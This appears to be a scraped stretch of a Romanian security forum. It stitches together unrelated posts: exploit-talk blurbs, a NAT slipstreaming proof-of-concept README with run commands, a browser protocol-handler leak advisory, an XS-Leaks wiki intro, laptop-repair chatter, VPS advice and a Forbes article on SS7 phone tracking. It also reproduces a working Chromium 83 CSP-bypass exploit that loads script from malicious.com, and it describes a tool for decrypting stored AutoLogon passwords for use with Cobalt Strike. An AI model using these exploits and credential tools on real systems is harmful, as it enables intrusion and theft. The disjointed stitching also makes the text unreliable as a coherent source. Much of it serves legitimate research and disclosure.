Nytro

This talk will reveal the iOS 13 exploits I showcased earlier on Twitter (@08Tc3wBB) – an exploit chain for iOS 13.7 that relies upon a different kernel vulnerability since the 13.6 update patched the old one. I’ll be talking about the root cause and techniques used during the exploit development to bypass the mitigations that are unique to iOS to ultimately get the privilege of reading and writing kernel memory. === 08Tc3wBB is a Bug Bounty Hunter and a Security Researcher.

Slipstream This is a proof of concept for the NAT slipstreaming vulnerability discussed here. Building slipstream has no external dependencies and does not depend on CGO. You can build the executable and/or cross compile for other platforms using the go compiler with the following command: go build Usage slipstream will produce a single executable that is both the server and client. You must first setup the server on a remote host that it outside of your NAT: ./slipstream -l -lp 5060 You can then use slipstream to connect to the host outside of your NAT and let it attempt to connect back to you: ./slipstream -ip <local ip> -host <remote host> -rp 5060 -lp <local port> Why another implementation? After spending many hours attempting to get the original code working with no success I was left at a point of not knowing if my router was simply not vulnerable, I had misconfigured the code, the code was broken, or there were other implementation details stopping it from working. Eventually I was shown another implementation of the attack that skipped over the web based delivery instead focusing just on exploitation of the ALGs. This code is heavily based on that implementation though provides an end to end client and server to make testing simpler and avoids using an HTTP client to send the request due to issues discovered. What about web based delivery? At time of writing the major browser vendors (Chromium and Firefox) have since provided mitigations against this through blocking outbound connections to port 5060. It's theoretically possible that this could be bypassed by switching to a different port or attempting to use a different ALG altogether. I'm assuming SIP was chosen due to it's similarity to HTTP and widespread use. In testing some of the higher end enterprise gear we discovered that due to slight differences (the / used in the HTTP path, the HTTP version, rather than SIP/2.0, and differing headers) some networking equipment fails to parse the SIP requests generated by an HTTP client and simply drops them at the router. Given that it's been blocked by browsers and delivery is unreliable by HTTP client no attempt was made to port the newer webscan technique for local ip discovery for web based delivery or identify a browser bypass. License MIT Sursa: https://github.com/jrozner/slipstream

Leaking Browser URL/Protocol Handlers By Rotem Kerner | December 03, 2020 FortiGuard Labs Threat Research Report Affected platforms: Windows, Linux Impacted parties: Chrome, Firefox and Edge Impact: Leaking sensitive data Severity level: Medium Assigned CVEs: CVE-2020-15680 An important step in any targeted attack is reconnaissance. The more information an attacker can obtain on the victim the greater the chances for a successful exploitation and infiltration. Recently, we uncovered two information disclosure vulnerabilities affecting three of the major web browsers which can be leveraged to leak out a vast range of installed applications, including the presence of security products, allowing a threat actor to gain critical insights on the target. In this post we will discuss what are protocol handlers and disclose two information disclosure vulnerabilities affecting three major browsers (namely - Firefox, Edge and Chrome). Exploiting these vulnerabilities will enable a remote attacker to identify the presence of a vast amount of applications that may be installed on a targeted system. Overview - What Are Protocol Handlers? Generally speaking when talking about Protocol Handlers we are referring to a mechanism which allows applications to register their own URI scheme. This enables the execution of processes through the use of URI formatted strings. The Windows OS manages custom URL handlers under the following key- HKEY_CURRENT_USER\SOFTWARE\Classes\* HKEY_LOCAL_MACHINE\SOFTWARE\Classes\* HKEY_CLASSES_ROOT\* When a URL Handler is invoked the OS is searching within those locations for keys containing values with the name “URL Protocol”. For instance, we can use regedit to inspect the path at HKEY_CLASSES_ROOT\msteams and see that it contains the special Value of “URL Protocol”. Figure 1 Looking further into HKEY_CLASSES_ROOT\msteams\shell\open\command\ we can see the actual command that gets invoked - Figure 2 Figure 3 In this example the browser will launch Teams.exe when a url that starts with “msteams” is clicked. Web browsers will enable their users to click on links with non-http schemes which will result in prompting the user with a message box asking them if they want to let another application handle this URL. Figure 4 Though it requires user interaction and thus poses a limited risk, it expands the attack surface beyond the browser borders. An attacker could craft a special web page which triggers another potentially vulnerable application. In some cases, such attacks may bypass protection measures such as Smart Screen and other security products. While exploring the potential of attacking the browsers through the different protocol handlers I got curious as to whether web browsers somehow disclose what protocols handlers exist on a targeted system. The short answer is yes. Leaking Protocol Handlers In this section we disclose how both Chrome, Edge and Firefox were circumvented in order to disclose which protocol handlers exist on a targeted system. It's worth mentioning that these findings are the result of manually playing with HTML/CSS components with the emphasis on finding a difference in behavior when referring (using some elements) to existing and non-existing URL handlers. The environment I’ve been testing on is Windows 10 but it is fair to assume that the same vulnerabilities exist on other platforms (such as Linux and Mac). Leaking Firefox protocol handlers (CVE-2020-15680) This vulnerability has been tested on Firefox 78.0.1 (64-bit) under Windows 10. To leak the protocol handlers in Firefox we leverage differences in the way firefox renders images sourced from existing and non-existing protocol handlers. For example, if we will try to load a web page containing the following element - And observe the elements styling using developer tools we would see that the default styling for broken images generate element with size of 24x24 as can be seen in Figure-5. Figure 5 Unlike the example above, if we try and create an image element and set source to some non-existent handler like the following. This will result with an element with different sizing of 0x0 as can be seen in Figure-6. Figure 6 This difference can be measured using a simple JS script Basing on this a malicious actor may perform a brute-force attack to disclose the different protocol handlers on a targeted system. The following example code will print whether a handlers exists or not on a targeted system. Leaking Chrome and Edge protocol handlers This vulnerability has been tested on Chrome 83.0.4103.116 under Windows 10. The exploitability of this vulnerability may be less stealthy but still yields equivalent results as the Firefox vulnerability. The mechanism here was different than the one in Firefox, here we leverage the fact that the window lose focus whenever the user is challenged with the message box as can be seen in figure-7. Figure 7 So, in order to detect if a given handler exists on the victim we take the following steps. First, we dynamically generate a link that is made of the scheme we would like to detect like such - Then we trigger the link and detect whether the document has focus: That will work for a one time check however if we would like to brute force an entire list of handlers we would have to get rid of the message box every time it pops up or else the document.hasFocus() will always return true. Figure 8 The technique we came up with was to redirect the user to an entirely different domain/ip which will eliminate any previously opened message box. Figure-8 draws the general idea of how the flow should be carried out in order to work. Protocol Handler Test page performs the actual test and saves the results to the back-end. In case the handler exists, it will redirect to “Redirect-Back Page” which exists on domain2.com. The redirection will get rid of the message box. Finally, back to the Protocol Handler Test Page for the next handler test. Vulnerabilities Impact Such information disclosure vulnerability could be exploited in several different ways. Here are some examples: Identifying communication channels: By listing the handlers an attacker can get a hint to what platforms he may use for reaching the targeted user. For instance, detecting social applications such as Slack, Skype, WhatsApp or Telegram may be used for communicating with the target. General reconnaissance: A wide range of applications nowadays uses custom URL handlers and can be detected using this vulnerability. Some examples: music players, IDE, office applications, crypto-mining, browsers, mail applications, antivirus, video conferencing, virtualizations, database clients, version control clients, chat clients, voice conference apps, shared storages Pre-exploitation detection: Exploit kits may leverage this information in order to identify if a potentially vulnerable application is present without exposing the vulnerability itself. Detecting Security solutions: Many security solutions such as AV products register protocol handlers whose presence can be exposed by leveraging the vulnerabilities because they have custom protocol handlers installed. Attackers may use this to further customize their attack to be able to circumvent any protection mechanism set by those security solutions. User Fingerprinting: reading what protocol handlers exist on a system may also be used in order to improve browser/user fingerprinting algorithms. Vendor Response Below is a table specifying the vendor responses: Vendor Vendor Response Mozilla The security team at mozilla were quick to respond and have issued a fix for the bug. - CVE-2020-15680 Microsoft The vendor decided not to fix the issue due to the following explanation - “This is by design (and not a security issue) - if we want to support registered protocol handler links from the browser, it seems like there'll be various ways to detect whether a link for a particular protocol handler worked or not” Google The vendor decided to treat this as a “user fingerprinting issue” rather than a security issue and are working on a patch. “The general consensus on the security team is that none of the concerns here relate to leaking user data, and that this is best handled as a fingerprinting bug” Summary In this post we uncovered a new type of information disclosure vulnerabilities in Chrome, Edge and Firefox and identified how attackers can leverage them to gain valuable insights which could assist them in compromising their targets. When browsers are enabling the interaction with other applications through URL handlers, they may be easing the engagement with third party software, but they also enable a wider attack surface by giving the attacker a chance to attack the user through other applications. While Microsoft and Google currently don't consider it a security issue, we believe that being able to expose the presence of other software, including security software, on targeted devices should be prevented. With that being said, we anticipate that in the near future we shall see an increase in the number of attacks which exploit the different URL handlers through the user's web browser. FortiEDR can detect and block these browser-based exploits and provide visibility into such attempts. Sursa: https://www.fortinet.com/blog/threat-research/leaking-browser-url-protocol-handlers

#Title: Chromium 83 - Full CSP Bypass #Date: 02/09/2020 #Exploit Author: Gal Weizman #Vendor Homepage: https://www.chromium.org/ #Software Link: https://download-chromium.appspot.com/ #Version: 83 #Tested On: Mac OS, Windows, iPhone, Android #CVE: CVE-2020-6519 (function(){ var payload = ` top.SUCCESS = true; var o = document.createElement("object"); o.data = \`http://malicious.com/bypass-object-src.html\`; document.body.appendChild(o); var i = document.createElement("iframe"); i.src = \`http://malicious.com/bypass-child-src.html\`; document.body.appendChild(i); var s = document.createElement("script"); s.src = \`http://malicious.com/bypass-script-src.js\`; document.body.appendChild(s); `; document.body.innerHTML+="<iframe id='XXX' src='javascript:" + payload +"'></iframe>"; setTimeout(() => { if (!top.SUCCESS) { XXX.contentWindow.eval(payload); } }); }()) // further information: https://github.com/weizman/CVE-2020-6519 Sursa: https://www.exploit-db.com/exploits/49195?utm_source=dlvr.it&utm_medium=twitter

WDAC Policy Wizard The Windows Defender Application Control Wizard (Version 1.6.1) enables IT professionals to build and deploy WDAC code integrity (CI) policies by wrapping the CI PowerShell cmdlets. Use this application to create new base and supplemental policies, in addition to editing and merging exisiting (CI) policies. Getting Started You can install the policy wizard by selecting the download link. Before you install the application: Review the Microsoft open source license for the app. Review the Getting Started instructions on the project's Github repository. Review the change list on the Archives Page. Download the Installer What's new The Windows Defender App Control Wizard Version 1.6.1 offers new functionality and bug fixes. The application is updated multiple times per month. Learn more about the new features in Version 1.6.1 in the WDAC changelog. About the Project The Windows Defender App Control Wizard Version was created by the Microsoft WDAC feature team as part of an ongoing effort to provide enhancing tooling for professionals leveraging WDAC technologies. See the About Page for more information. Sursa: https://webapp-wdac-wizard.azurewebsites.net/

This tool can extract/decrypt the password that was stored in the LSA by SysInternals AutoLogon. I made this to be used with Cobalt Strike's execute-assembly: Compiled with .NET 3.0 (Windows Vista's default)+. Needs to be run as SYSTEM. Not just as a high intgrity process because the special registry keys need are only visible to SYSTEM and can only be decyrpted by SYSTEM. Why? In order to support Kiosk mode Windows needs to keep the user's password in a reversable format. This was being kept at HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon under "DefaultUserName" and "DefaultPassword" . Autologon was updated to store the passwords in the LSA Secrets registry keys that are only visible to SYSTEM. keithga provided a binary that popped a Message but no source code or command line version. How it works Through pInvoke calls: LSAOpenPolicy() LsaRetrievePrivateData() Credits Reverse Engineered this: https://keithga.wordpress.com/2013/12/19/sysinternals-autologon-and-securely-encrypting-passwords/ Copy and Pasted EVERYTHING from here: https://www.pinvoke.net/default.aspx/advapi32/LsaOpenPolicy.html Icon from: https://icon-icons.com/icon/lock-secure-password/99595 SysInternals: https://docs.microsoft.com/en-us/sysinternals/downloads/autologon So thanks to who actually did the work: keithga, frohwalt Download Compiled Version HERE Sursa: https://github.com/securesean/DecryptAutoLogon

XS-Leaks Wiki # Overview # Cross-site leaks (aka XS-Leaks, XSLeaks) are a class of vulnerabilities derived from side-channels 1 built into the web platform. They take advantage of the web’s core principle of composability, which allows websites to interact with each other, and abuse legitimate mechanisms 2 to infer information about the user. One way of looking at XS-Leaks is to highlight their similarity with cross-site request forgery (CSRF 3) techniques, with the main difference being that instead of allowing other websites to perform actions on behalf of a user, XS-Leaks can be used to infer information about a user. Browsers provide a wide variety of features to support interactions between different web applications; for example, they permit a website to load subresources, navigate, or send messages to another application. While such behaviors are generally constrained by security mechanisms built into the web platform (e.g. the same-origin policy), XS-Leaks take advantage of small pieces of information which are exposed during interactions between websites. The principle of an XS-Leak is to use such side-channels available on the web to reveal sensitive information about users, such as their data in other web applications, details about their local environment, or internal networks they are connected to. Cross-site oracles # The pieces of information used for an XS-Leak usually have a binary form and are referred to as “oracles”. Oracles generally answer with YES or NO to cleverly prepared questions in a way that is visible to an attacker. For example, an oracle can be asked: Does the word secret appear in the user’s search results in another web application? This question might be equivalent to asking: Does the query ?query=secret return an HTTP 200 status code? Since it is possible to detect the HTTP 200 status code with Error Events, this has the same effect as asking: Does loading a resource from ?query=secret in the application trigger the onload event? The above query could be repeated by an attacker for many different keywords, and as a result the answers could be used to infer sensitive information about the user’s data. Browsers provide a wide range of different APIs that, while well-intended, can end up leaking small amounts of cross-origin information. They are described in detail throughout this wiki. Example # Websites are not allowed to directly access data on other websites, but they can load resources from them and observe the side effects. For example, evil.com is forbidden from explicitly reading a response from bank.com, but evil.com can attempt to load a script from bank.com and determine whether or not it successfully loaded. Example Suppose that bank.com has an API endpoint that returns data about a user’s receipt for a given type of transaction. evil.com can attempt to load the URL bank.com/my_receipt?q=groceries as a script. By default, the browser attaches cookies when loading resources, so the request to bank.com will carry the user’s credentials. If the user has recently bought groceries, the script loads successfully with an HTTP 200 status code. If the user hasn’t bought groceries, the request fails to load with an HTTP 404 status code, which triggers an Error Event. By listening to the error event and repeating this approach with different queries, the attacker can infer a significant amount of information about the user’s transaction history. In the example above, two websites of two different origins (evil.com and bank.com) interacted through an API that browsers allow websites to use. This interaction didn’t exploit any vulnerabilities in the browser or in bank.com, but it still allowed evil.com to gain information about the user’s data on bank.com. Root cause of XS-Leaks # The root cause of most XS-Leaks is inherent to the design of the web. Oftentimes applications are vulnerable to some cross-site information leaks without having done anything wrong. It is challenging to fix the root cause of XS-Leaks at the browser level because in many cases doing so would break existing websites. For this reason, browsers are now implementing various Defense Mechanisms to overcome these difficulties. Many of these defenses require websites to opt in to a more restrictive security model, usually through the use of certain HTTP headers (e.g. Cross-Origin-Opener-Policy: same-origin), which often must be combined to achieve the desired outcome. We can distinguish different sources of XS-Leaks, such as: Browser APIs (e.g. Frame Counting and Timing Attacks) Browser implementation details and bugs (e.g. Connection Pooling and typeMustMatch) Hardware bugs (e.g. Speculative Execution Attacks 4) A little bit of history # XS-Leaks have long been part of the web platform; timing attacks to leak information about the user’s web activity have been known since at least 2000. This class of issues has steadily attracted more attention 5 as new techniques were found to increase their impact. In 2015, Gelernter and Herzberg published “Cross-Site Search Attacks” 6 which covered their work on exploiting timing attacks to implement high impact XS-Search attacks against web applications built by Google and Microsoft. Since then, more XS-Leak techniques have been discovered and tested. Recently, browsers have implemented a variety of new defense mechanisms that make it easier to protect applications from XS-Leaks. About this wiki # This wiki is meant to both introduce readers to XS-Leaks and serve as a reference guide for experienced researchers exploiting XS-Leaks. While this wiki contains information on many different techniques, new techniques are always emerging. Improvements, whether they add new techniques or expand existing pages, are always appreciated! Find out how you can contribute to this wiki and view the list of contributors in the Contributions article. References # Side Channel Vulnerabilities on the Web - Detection and Prevention, link ↩︎ In some cases, these features are maintained to preserve backwards compatibility. But, in other cases, new features are added to browsers regardless of the fact that they introduce potential cross-site leaks (e.g. Scroll to Text Fragment), as the benefits are considered to outweigh the downsides. ↩︎ Cross Site Request Forgery (CSRF), link ↩︎ Meltdown and Spectre, link ↩︎ Browser Side Channels, link ↩︎ Cross-Site Search Attacks, link ↩︎ Sursa: https://xsleaks.dev/#xs-leaks-wiki

This video is an explanation of prototype pollution vulnerability in kibana that, in a super cool and very creative way, was used to achieve remote code execution in kibana software. Blogpost: https://research.securitum.com/protot... Researcher's twitter: https://twitter.com/SecurityMB Follow me on twitter: https://twitter.com/gregxsunday Timestamps: 00:00 Intro 00:34 Prototype pollution 02:27 Vulnerability discovery 04:14 Exploitation #rce #prototypePollution #cve-2019-7609

A website that shows "update screen" animations in your browsers, so you can put the browser in fullscreen and prank friends https://updatefaker.com/ F11

Poate reusesti cu qemu, dar daca nu e ceva "facut", ar putea sa iti ia ceva timp sa il face sa mearga.

Da, exact la acest video m-am uitat. Nu parea asa greu Bine, nu e tocmai mare inginerie, dar banuiesc ca trebuie ceva mai multa dexteritate, rabdare si experienta practica ca sa faci asa ceva.

Da, are sens ce zici, dar multe ma depasesc. Astept sa vad cei de la service, par sa fie ok, sa se priceapa. In orice caz, am backup la date, deci nu e ceva critic pentru mine, de aceea nu prea ma agit. Sper sa nu fie vreun scurt-circuit pe acolo. Ideea e ca sunt 3 conectori "curcubeu" (cred) si cel putin unul, cel de la tastatura, e posibil sa nu il fi bagat cum trebuie ca desprinsesem o bucatica de plastic care il tinea acolo. Eu am bagat-o la loc, cat de cat ok, dar cine stie. Incerc sa ma mai uit pe Youtube la tutoriale, poate mai prind si eu cate ceva.

Nu a fost nevoie sa scot vreun cablu de la monitor, ci doar niste mufe care ajungeau la tastatura/touchpad. Acum, eu sper ca le-am pus bine. Dar e in regula, daca e vreun scurtcircuit si ia ceva foc, ia foc la service

Da, cred ca e primul punct. Am incercat sa misc usor de ele dar nu a functionat. A, mai era o chestie ciudata. Cand "apasam" incet pe tastatura, in partea de sus, se auzea un sunet ca si cum s-ar atinge un ventilator De topit nu ar trebui sa fie probleme, ca am desprins toata partea cu tastatura si asa "am lucrat". In cel mai rau caz crapam complet tastatura/touchpad, pe partea aceasta. Mentionez ca nu sunt la prima experienta de acest fel. La laptop-ul anterior am mai incercat ceva si tot nu a iesit bine... Concluzie: Imi vad de ale mele si fac ce ma pricep. NU ma mai bag la probleme hardware, poate doar daca e ceva extrem de simplu, dar nici asa nu imi mai vine sa ma risc.

Da, interesanta ideea. Ma intrebam cum decripteaza traficul TLS, dar e mentionat ce poate prinde si TLS nu e printre ele, nu ar fi avut cum.

Salut, am avut o problema cu tastatura de pe un Asus RoG G750, mai batran (dar inca in putere), pe care il am si am zis sa o schimb. Am facut comanda doar de tastatura (putea veni si cu palmrest dar am zis ca nu merita) si am incercat sa o montez. Skill-urile mele de hardware sunt spre 0 si nici dexteritatea nu ma ajuta. Dar am un sfat pentru voi: nu faceti asta! Partea cu demontatul nu e atat de grea, dar ca de fiecare data am ramas cu niste suruburi in plus. Cred ca cei care fac laptop vor sa faca misto de noi, cei neprofesionisti, si baga suruburi in plus, nu stiu ce e cu ei. Partea cu schimbatul tastaturii nu a fost insa asa usoara cum ma asteptam, are o mizerie de mecanism la care trebuie sa topesti cu un pistol de lipit multe bucatele de plastic sa o poti scoate si apoi trebuie sa pui plastic topit la loc. Avand un pistol de lipit, am umplut casa de fum si am dat-o jos pe cea veche. O "montez" eu pe cea noua dar nu am avut rabdare sa pun plastic topit in 200 de gaurele. Asta a insemnat ca tastatura nu sta cum trebuie, sta in interior Acum vine partea cea mai retardata: Montez eu laptop-ul, bag si eu cum pot niste porcarii de "chestii" care se conecteaza din palmrest si tastatura, pun totul cap la cap (teoretic) si ii dau drumul. Sunt fericit ca merge butonul de power, deci macar ceva merge dar se pare ca... monitorul nu se aprinde, ramane negru . Are cineva idee ce ar putea avea? Nu am umblat pe la firele care duc la monitor si am incercat sa am grija in general. Nu gasesc nicio explicatie. Intelegeam daca nu mergea noua tastatura sau touchpad-ul dar chiar nu ma asteptam sa nu se aprinda ecranul. PS: Acum laptop-ul e la "spital", la un service. Sper ca ei sa ii dea de cap, dar sunt curios ce am facut acolo.

Salut, de ce vrei sa inveti programare? Vrei sa faci aplicatii web, de exemplu? Cred ca ar fi un bun inceput. Eu zic sa incepi prin a invata HTML si CSS. Nu sunt limbaje de programare, dar sunt necesare. Apoi cred ca poti invata JavaScript si sa le combini. Cred ca ar fi bine pentru inceput. Ca sa inveti: citeste o carte. Sau doua. Exista carti care acopera aceste subiecte impreuna, sau separat. Daca nu vrei sa folosesti carti, cauta niste tutoriale, dar sigura-te ca gasesti unele bune. Sunt miliarde pe acest subiect. Tot ce trebuie sa stii e putina engleza.

HUMBLE BOOK BUNDLE: HACKING 101 BY NO STARCH PRESS We've teamed up with No Starch Press for our newest bundle with a wealth of great ebooks for you to enjoy!! Get ebooks like Metasploit, Web Security for Developers, Real-World Bug Hunting, and Black Hat Go. Plus, your purchase will support the National Coalition Against Censorship and the No Starch Press Foundation! US$655 WORTH OF AWESOME STUFF PAY €1 OR MORE DRM-FREE MULTI-FORMAT 13,165 BUNDLES SOLD GET THE BUNDLE TIME LEFT REMIND 17 days Supporting PAY €1 TO UNLOCK! Locked contentHacking: The Art of Exploitation, 2nd Edition Locked contentThe Car Hacker's Handbook: A Guide for the Penetration Tester Locked contentMetasploit: A Penetration Tester's Guide PAY €6.77 OR MORE TO ALSO UNLOCK! Locked contentPractical Malware Analysis: The Hands-On Guide to Dissecting Malicious Software Locked contentPenetration Testing: A Hands-On Introduction to Hacking Locked contentAttacking Network Protocols: A Hacker's Guide to Capture, Analysis, and Exploitation Locked contentPractical Packet Analysis, 3rd Edition: Using Wireshark to Solve Real-World Network Problems PAY €8.46 OR MORE TO ALSO UNLOCK! Locked contentPractical Binary Analysis: Build Your Own Linux Tools for Binary Instrumentation, Analysis, and Disassembly Locked contentMalware Data Science: Attack Detection and Attribution Locked contentLinux Basics for Hackers: Getting Started with Networking, Scripting, and Security in Kali Locked contentThe Linux Command Line, 2nd Edition: A Complete Introduction Locked contentSerious Cryptography: A Practical Introduction to Modern Encryption PAY €15.23 OR MORE TO ALSO UNLOCK! Locked contentRootkits and Bootkits: Reversing Modern Malware and Next Generation Threats Locked contentBlack Hat Go: Go Programming For Hackers and Pentesters Locked contentThe Hardware Hacker: Adventures in Making and Breaking Hardware Locked contentWeb Security for Developers: Real Threats, Practical Defense Locked contentFoundations of Information Security: A Straightforward Introduction Locked contentReal-World Bug Hunting: A Field Guide to Web Hacking SUPPORT CHARITY National Coalition Against Censorship The No Starch Press Foundation Sursa: https://www.humblebundle.com/books/hacking-101-no-starch-press-books

Nu avem de ce sa ne facem griji deoarece dusmanii nu stiu ca nu avem bomba nucleara. Cautati pe Youtube "bomba nucleara" sa va convingeti.

Atentie! Phishng-ul devine din ce in ce mai realist!

Cel mai probabil nu vor exista. temporar. Va creste industria producatoare de "metale", agricultura ca sa nu murim de foame si in general acele "lucruri esentiale" pentru supravieture. Dar nu cred ca se va ajunge la asa ceva, nu e cazul in anii imediat urmatori. Poate sa fie cand se termina resursele planetei, nu stiu. Eu nu mi-as face griji pentru job ci pentru supravietuire. Mergem la tara si mancam zacusca 2-3 ani pana se termina.

Tutorial algoritmi

Poate omul a venit sa invete, haide sa incercam sa il ajutam. - Linux-ul este un sistem de operare, ca si acel Windows pe care il ai. Te ajuta sa faci ceva util cu calculatorul/laptopul, ca sa nu fie doar o caramida. - Pe Linux, ca si pe Windows, poti crea mai multi useri. Asa cum tu ai un cont pe Facebook/RST sau alte platforme, asa poti avea un cont, user, pe Linux - Userii de sistem de operare, mai putin comun pe Windows pentru mediul "de acasa", pot fi limitati. Adica un user normal, nu poate de exemplu instala programe - Pe Windows pot fi aceste limitari de asemenea. Dar exista un user, Administrator, care are permisiuni depline asupra sistemului de operare (de fapt nu e Administrator ci NT Authority/System, dar ideea e aceeasi). Acest user, Administrator, poate instala programe, crea sau sterge noi useri si face multe alte lucruri - Pe linux acest cont special, cu privilegii totale pe sistemul de operare se cheama "root". Cum am zice noi, romanii, acest root "taie si spanzura" Asa cum tu ai Windows pe calculator/laptop si ai un cont cu privilegii de Administrator, asa ai putea sa iti instalezi Linux in loc de Windows si sa ai "root". Dar nu e nevoie sa stergi Windows-ul, tehnologia a evoluat si poti rula cam orice sistem de operare, inclusiv Linux, in ceea ce se cheama "Masina Virtuala". Adica descarci un program ca VMWare Player sau VirtualBox si acestea, in "interiorul" lor, iti permit sa instalezi un alt sistem de operare fara sa pierzi nimic din ce ai. Astfel, poti instala simplu si rapid Linux intr-o masina virtuala. Cauta pe Google "How to install Ubuntu", unde Ubuntu e o versiune de Linux mai simplu de inteles, cu interfete grafice. Si asa poti invata Linux. Acum ca am stabilit ce e un "root", putem trece la problema ta. Tu vrei acest root cu un anumit motiv. Care ar fi acela? Daca ai gasit vreun tutorial de "hacking smechereste za boss cum sa faci miliarde" si acolo ai vazut de acest "root", ar trebui sa alegi o alta sursa de informatii. Nu credeam, sau cel putin speram, ca mai sunt la moda mizeriile astea care se faceau acum 20 de ani. Ca o completare, asa cum tu iti instalezi o masina virtuala cu Linux, asa multe persoane au sistemele Linux expuse in Internet. RST Forums este un exemplu. Este un server cu Linux, expus in Internet. Ceea ce inseamna ca noi, cei din echipa RST, ne putem conecta la el si sa avem "root". Ce facem cu el? Ne asiguram ca forumul merge cum trebuie, ca este actualizat si spargem NASA de 2-3 ori pe saptamana. Ok, am glumit la partea cu NASA. Deci nu facem nimic "interesant". Ce se poate intampla e ca "baieti rai" de pe Internet sa ghiceasca parola de root (nu te complica la RST, nu o sa mearga, nu stie nimeni cum il cheama pe cainele meu Rex care e si parola la "root"). Aceste persoane obtin acces la servere de pe Internet cu acces "root" (deplin) sau mai limitat. Ce pot sa faca? Sa aiba acces la ce date sunt pe acel server. Ce altceva? Sa il foloseasca ca sa faca diferite atacuri idioate, gen sa atace alte servere, sa trimita mail-uri cu spam sau multe alte porcarii. Cand am zis ca poti cumpara de la DigitalOcean sau Vultr un root cu 5 $ nu am glumit. Poti cumpara cu 5$ un VPS (Virtual Private Server), adica o masina virtuala expusa in Internet, te poti conecta la ea si loga ca "root" si sa faci ce vrei cu ea. E modalitatea cea mai simpla. Insa daca vrei sa faci "nasoale", cel mai probabil VPS-ul o sa fie inchis rapid. Sugestia mea e sa te gandesti daca "merita". Oare o sa sara milioanele de dolari pe tine daca faci asta? Probabil ca nu. Vine cu niste riscuri la pachet, merita? Probabil ca nu. Stii bine ce faci si stii cum sa te feresti sa nu fii prins? Probabil ca nu. Asadar, ca o concluzie, invata mai intai despre ce e vorba si o sa iti dai seama ca e o "mizerie".

Cumperi unul cu 5$ de la DigitalOcean, Vultr sau alti provideri de VPS-uri. Iti vine parola pe mail sau o setezi din interfata web, te loghezi prin SSH si incepi sa "hachezi".

This Surveillance Tool Can Find You With Just Your Telephone Number — And These 25 Countries Bought It, Warn Researchers Thomas Brewster Forbes Staff Cybersecurity Associate editor at Forbes, covering cybercrime, privacy, security and surveillance. A surveillance technology that can identify the location of a phone anywhere in the world in just seconds with only a telephone number has been sold to 25 countries, some with chequered records on human rights, according to research released Tuesday. The tech was supplied by the Israeli business Circles, claimed Citizen Lab, a University of Toronto organization that has long tracked the activities of surveillance companies. Circles is a sister company of NSO Group, an iPhone and Android spyware developer that is currently being sued by Facebook over attacks on the WhatsApp accounts of 1,400 users and has been criticized for selling to nations who went on to spy on activists, journalists and other citizens. According to Citizen Lab, the Circles tracking tool was detected in both Western, democratic countries, and nations with poor human rights records. The full list, according to Citizen Lab and neither confirmed nor denied by Circles, included: Australia, Belgium, Botswana, Chile, Denmark, Ecuador, El Salvador, Estonia, Equatorial Guinea, Guatemala, Honduras, Indonesia, Israel, Kenya, Malaysia, Mexico, Morocco, Nigeria, Peru, Serbia, Thailand, the United Arab Emirates (U.A.E.), Vietnam, Zambia, and Zimbabwe. Technology made by Circles, an Israeli intelligence provider, can find a person's phone with just their number. As many as 25 countries use it, leading to concerns about ethics. GETTY The technique used by the Circles snooping tech is known as Signaling System 7 (SS7) exploitation, a powerful yet difficult-to-detect tool in government spy arsenals. It’s named after the portion of the telecoms network that deals with cross-border functionality and billing. When, for instance, you travel to another country, the SS7 network is used to move your phone over to a partner telecoms provider and adjust billing accordingly. But should a surveillance vendor have access to SS7 networks, either via hacking or acquiring it, they can send commands to a subscriber’s “home network” falsely indicating the subscriber is roaming. That will, in turn, reveal their location, though only the coordinates of the cell tower closest to the phone. It may also be possible to intercept calls and texts through SS7 exploitation, though Circles technology is only for location detection, according to two industry sources. (According to trademark filings, it does have a technology called PixCell for “tapping into or intercepting targets' wireless, telephone, computer, and internet communications.”) If such a significant number of countries have bought access to the Circles tool, it would indicate that all can locate a phone, and its owner, at rapid speed. Marczak noted that one of the main selling points of the Circles tool was that it didn’t need cooperation from a telecoms company. If used by countries with lax rule of law and human rights controls, it could help repressive government surveillance agencies track targets across borders, without the need for a warrant, Citizen Lab researcher Bill Marczak warned. Many of the countries listed as likely Circles customers have a track record of using surveillance tools against dissidents and activists, Citizen Lab claimed. Forbes previously revealed Circles’ sales to Mexico, whilst others had reported on deals with the U.A.E., where it was alleged the company’s tools were used to carry out surveillance on the Emir of Qatar and the prime minister of Lebanon. The U.A.E., for instance, allegedly targeted the now imprisoned activist Ahmed Mansoor with malware from at least three different companies - NSO Group included - before arresting him in 2017. Mexico, meanwhile, “serially abused NSO Group’s Pegasus spyware” in targeting at least 25 reporters, human rights defenders, and the families of individuals killed or disappeared by cartels, according to previous Citizen Lab research. NSO has always stated that it works for legitimate government agencies on investigations into the worst kinds of crimes, and has an ethics committee that reviews contracts, though it cannot comment on the identity of its customers. “Given Circles' affiliation with NSO Group, and repeated spyware abuse by NSO customers, it's disappointing to see Western governments patronizing the company,” added Marczak. An NSO spokesperson gave Forbes a joint NSO and Circles response, stating: “NSO and Circles are separate companies within the same corporate family, both of which lead their industries in a commitment to ethical business and adhere to strict laws and regulations in every market in which they operate. As we have previously stated, Circles is involved in search and rescue and tactical geolocation technology. “We cannot comment on a report we have not seen. Given Citizen Lab’s track record, we imagine this will once again be based on inaccurate assumptions and without a full command of the facts. As ever, we find ourselves being asked to comment on an unpublished report from an organization with a predetermined agenda.” The spokesperson declined to comment on the countries listed by Citizen Lab as customers. Citizen Lab said it tracked down Circles customers by looking for a unique “fingerprint” on servers across the globe that helped them identify where the spy tool was deployed. That fingerprint was built on numerous data points, most significantly a web domain that was linked to Circles business, according to the full technical report. Spying in Circles Circles was an independent intelligence agency vendor up until 2014, when it was acquired by private equity company Francisco Partners for $130 million and merged into a larger surveillance company. That umbrella organization also included NSO Group. But Circles isn’t the only SS7 surveillance provider on the market. Cyprus-based Intellexa, set up by former Circles co-founder Tal Dilian, uses SS7 exploitation as one of its many tools to track a target. Israeli companies Verint, Rayzone and 1rstWAP offer similar services, according to one industry executive. Ability Inc., another Israeli firm, tried to take the tech global, but crashed out of the Nasdaq after failing to secure customers. Those providers’ days should, in theory, be numbered, if they stick to solely doing SS7 attacks. The flaws that allow SS7 attacks to take place have long been fixable. The attacks are only possible because SS7, in its original form, doesn’t require any authentication to guarantee the legitimacy and safety of messages traversing the network. It would require some effort by global telecoms networks to address the flaws, but some efforts have been made to patch the vulnerabilities. The U.K., for instance, recently proposed telecommunications security legislation that would grant a regulator the authority to ensure the nation’s networks are secure against SS7 attacks. Nevertheless, whilst those gaping holes remain open across global networks, government spies can continue to track anyone, anywhere, with just their phone number. Sursa: 